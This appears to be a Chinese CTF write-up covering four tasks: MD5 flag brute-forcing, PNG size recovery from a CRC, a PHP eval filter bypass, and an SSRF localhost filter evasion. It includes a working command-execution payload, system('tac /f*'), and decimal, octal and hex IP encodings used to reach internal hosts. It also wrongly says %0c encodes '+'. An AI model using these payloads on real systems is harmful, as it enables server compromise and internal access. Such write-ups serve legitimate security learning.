g0at无意间发现了被打乱的flag:I{i?8Sms??Cd_1?T51??F_1?}
但是好像缺了不少东西,flag的md5值已经通过py交易得到了:88875458bdd87af5dd2e3c750e534741
flag的MD5值,写了好久的没有加ISCTF{}
,有些迷茫,多次尝试出来了
# 生成MD5值
import hashlib
s = '1234567890'
# ps = [i for i in range(len(s))]
with open('md5.txt', 'w') as f:
print('正在写入。。。')
for i in range(len(s)):
for j in range(len(s)):
for k in range(len(s)):
for l in range(len(s)):
for r in range(len(s)):
for m in range(len(s)):
for n in range(len(s)):
md5 = hashlib.md5(('ISCTF{md5_is_11' + s[i] + s[j] + '1' + s[k] + s[l] + '8' + s[r] + s[m] + s[
n]+'}').encode()).hexdigest() + '\n'
f.write(md5)
print('写入完成。')
# 寻找MD5数
import hashlib
s = '1234567890'
# ps = [i for i in range(len(s))]
with open('md6.txt', 'w') as f:
print('正在写入。。。')
for i in range(len(s)):
for j in range(len(s)):
for k in range(len(s)):
for l in range(len(s)):
for r in range(len(s)):
for m in range(len(s)):
for n in range(len(s)):
md5 = 'md5_is_11' + s[i] + s[j] + '1' + s[k] + s[l] + '8' + s[r] + s[m] + s[
n] + '\n'
f.write(md5)
print('写入完成。')
图片根据CRC校验可计算出原图片的宽高
import zlib
import struct
import argparse
import itertools
parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
help="输入同级目录下图片的名称")
args = parser.parse_args()
bin_data = open(args.f, 'rb').read()
crc32key = zlib.crc32(bin_data[12:29]) # 计算crc
original_crc32 = int(bin_data[29:33].hex(), 16) # 原始crc
if crc32key == original_crc32: # 计算crc对比原始crc
print('宽高没有问题!')
else:
input_ = input("宽高被改了, 是否CRC爆破宽高? (Y/n):")
if input_ not in ["Y", "y", ""]:
exit()
else:
for i, j in itertools.product(range(4095), range(4095)): # 理论上0x FF FF FF FF,但考虑到屏幕实际/cpu,0x 0F FF就差不多了,也就是4095宽度和高度
data = bin_data[12:16] + struct.pack('>i', i) + struct.pack('>i', j) + bin_data[24:29]
crc32 = zlib.crc32(data)
if(crc32 == original_crc32): # 计算当图片大小为i:j时的CRC校验值,与图片中的CRC比较,当相同,则图片大小已经确定
print(f"\nCRC32: {hex(original_crc32)}")
print(f"宽度: {i}, hex: {hex(i)}")
print(f"高度: {j}, hex: {hex(j)}")
exit(0)
highlight_file(__FILE__);
error_reporting(E_ERROR);
$str=$_GET['str'];
$pattern = "#\\\\\\\\/Ilikeisctf#";
function filter($num){
$num=str_replace("0x","1",$num);
$num=str_replace("0","1",$num);
$num=str_replace(".","1",$num);
$num=str_replace("e","1",$num);
$num=str_replace("+","1",$num);
return $num;
}
if(preg_match($pattern,$str,$arr))
{
echo "good try!";
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){
echo "come on!!!"; // trim:不指定参数时,移除字符串两侧的空格
if($num=='36'&isset($_GET['cmd'])){
eval($_GET['cmd']);
}else{
echo "hacker!!";
}
}else{
echo "hacker!!!";
}
}
看到一个eval()
可以执行代码,进入这里首要要满足,num通过is_numeric的检测,并且不等于36,去空后依然不等于36,经过过滤方法后依然等于36。
// 1.php
<?php
for($i = 0; $i<129; $i++){
$num=chr($i).'36';
if(trim($num)!=='36' && is_numeric($num) && $num!=='36'){
echo urlencode(chr($i))."\n";
}
};
http://localhost/1.php
结果:%0C %2B - . 0 1 2 3 4 5 6 7 8 9
%0c其实就是+号的url编码
Payload:?str=\\\\\\\\/Ilikeisctf&num=%0c36&cmd=system('tac /f*');
描述:都告诉你curl了,剩下的就别问了
点击this出现如下:
返回去查看源代码,在注释里有一段代码。
先尝试?urls=http://127.0.0.1/flag.php
发现被过滤了,localhost也不行。
尝试把127.0.0.1
转化为其他进制
- 2130706433 10进制 http://2130706433
- 017700000001 8进制 http://017700000001
- 7F000001 16进制 http://0x7F000001
尝试10进制可以,?urls=http://2130706433/flag.php
得到flag